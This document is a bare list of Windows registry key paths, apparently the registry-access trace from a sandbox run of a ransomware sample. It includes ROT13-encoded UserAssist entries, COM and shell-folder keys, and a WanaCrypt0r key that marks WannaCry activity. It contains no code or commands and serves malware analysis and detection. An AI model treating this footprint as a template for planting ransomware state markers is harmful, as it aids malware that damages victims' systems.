HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\Jvaqbjf AG\Npprffbevrf\jbeqcnq.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{QNN168QR-4306-P8OP-8P11-O596240OQQRQ}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\puneznc.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\qsethv.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{P804OON7-SN5S-POS7-8O55-2096R5S972PO}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zfvasb32.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zvtjvm\cbfgzvt.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zvtjvm\zvtjvm.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\Pbzzba Svyrf\Zvpebfbsg Funerq\Vax\FuncrPbyyrpgbe.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\Pbzzba Svyrf\Zvpebfbsg Funerq\Vax\GnoGvc.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\JvaqbjfCbjreFuryy\i1.0\cbjrefuryy.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\JvaqbjfCbjreFuryy\i1.0\CbjreFuryy_VFR.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\pbzrkc.zfp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{8NOQ94SO-R7Q6-84N6-N997-P918RQQR0NR5}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\bqopnq32.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{OO044OSQ-25O7-2SNN-22N8-6371N93R0456}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\vfpfvpcy.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\ZqFpurq.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{8NN47365-O2O3-1961-69RO-S866R376O12S}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\cevagznantrzrag.zfp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{OQ3S924R-55SO-N1ON-9QR6-O50S9S2460NP}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\JS.zfp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\NhgbUbgxrl\NhgbUbgxrl.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\NhgbUbgxrl\Pbzcvyre\Nux2Rkr.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{39SP1O9O-10P4-2R03-02N4-Q6NPNS02363S}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{RQ1O95O9-4031-Q3P3-673R-568RPON26559}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\Wnin\wer1.8.0_351\ova\wninpcy.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\erpqvfp.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zfen.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.QNGNONFRPBZCNER.RKR.15
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.FRGYNAT.RKR.15
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.ZFBHP.RKR.15
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.BpChoZte.rkr.15
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.FCERNQFURRGPBZCNER.RKR.15
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.zfbgq.rkr.15
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.zfbri.rkr.15
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{R4Q020S2-S887-O037-0792-4O4999S5SRS1}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\P:\Clguba38\clguba.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{7061SQ6Q-62S3-S0S7-86P9-Q7QR56QP59SS}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{O80459S0-73N2-1091-646R-NO6P9SR848QN}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_MinMFU
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UsersFiles\NameSpace\DelegateFolders\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UsersFiles\NameSpace\DelegateFolders\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UsersFiles\NameSpace\DelegateFolders\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\InProcServer32\LoadWithoutCOM
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2\Favorites
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2\FavoritesResolve
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\ScrollInset
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\DragDelay
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\DragMinDist
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\ScrollDelay
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\ScrollInterval
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\TurnOffSPIAnimations
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\TurnOffSPIAnimations
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\DataStore_V1.0\Disable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\DataStore_V1.0\DataFilePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane6
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane8
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane9
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane10
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane11
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane12
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane13
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane14
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane15
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane16
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\WanaCrypt0r\wd
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\##?#STORAGE#Volume#{808b4612-d164-11f0-869d-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\DeviceInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\##?#STORAGE#Volume#{808b4612-d164-11f0-869d-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\DeviceInstance
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E579AB5F-1CC4-44B4-BED9-DE0991FF0623}\ProgID\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E579AB5F-1CC4-44B4-BED9-DE0991FF0623}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E579AB5F-1CC4-44B4-BED9-DE0991FF0623}\AppID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{56BE716B-2F76-4DFA-8702-67AE10044F0B}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{56BE716B-2F76-4DFA-8702-67AE10044F0B}\LocalService
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{56BE716B-2F76-4DFA-8702-67AE10044F0B}\ServiceParameters
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{56BE716B-2F76-4DFA-8702-67AE10044F0B}\RunAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{56BE716B-2F76-4DFA-8702-67AE10044F0B}\ActivateAtStorage
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{56BE716B-2F76-4DFA-8702-67AE10044F0B}\ROTFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{56BE716B-2F76-4DFA-8702-67AE10044F0B}\AppIDFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{56BE716B-2F76-4DFA-8702-67AE10044F0B}\LaunchPermission
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\LegacyAuthenticationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\LegacyImpersonationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{56BE716B-2F76-4DFA-8702-67AE10044F0B}\AuthenticationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{56BE716B-2F76-4DFA-8702-67AE10044F0B}\RemoteServerName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{56BE716B-2F76-4DFA-8702-67AE10044F0B}\SRPTrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{56BE716B-2F76-4DFA-8702-67AE10044F0B}\PreferredServerBitness
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{56BE716B-2F76-4DFA-8702-67AE10044F0B}\LoadUserSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\LocalServer32\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\LocalServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\LocalServer32\ServerExecutable
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\AppID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\ProgID\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\AppID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\ProgID\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\AppID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_USERS\S-1-5-21-1381398318-3211537236-2227685884-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\S-1-5-21-1381398318-3211537236-2227685884-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{ad88c9c4-5f87-11ed-b63d-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{ad88c9c4-5f87-11ed-b63d-806e6f6e6963}\Generation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Arabic Transparent
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Arabic Transparent Bold
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Arabic Transparent,0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Arabic Transparent Bold,0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Helvetica
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Arial Baltic,186
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Arial CE,238
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Arial CYR,204
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Arial Greek,161
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Arial TUR,162
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Courier New Baltic,186
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Courier New CE,238
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Courier New CYR,204
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Courier New Greek,161
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Courier New TUR,162
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Times
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Times New Roman Baltic,186
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Times New Roman CE,238
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Times New Roman CYR,204
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Times New Roman Greek,161
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Times New Roman TUR,162
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\MS Shell Dlg 2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Tahoma Armenian
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Helv
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Tms Rmn
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\David Transparent
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Miriam Transparent
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Fixed Miriam Transparent
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Rod Transparent
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\FangSong_GB2312
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\KaiTi_GB2312
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\MS Shell Dlg
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{0000897b-83df-4b96-be07-0fb58b01c4a4}\LanguageProfile\0x00000000\{0001bea3-ed56-483d-a2e2-aeae25577436}\Enable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\CTF\EnableAnchorContext
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\Com+Enabled
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}\LocalService
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}\DllSurrogate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}\RunAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}\ActivateAtStorage
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}\ROTFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}\AppIDFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}\LaunchPermission
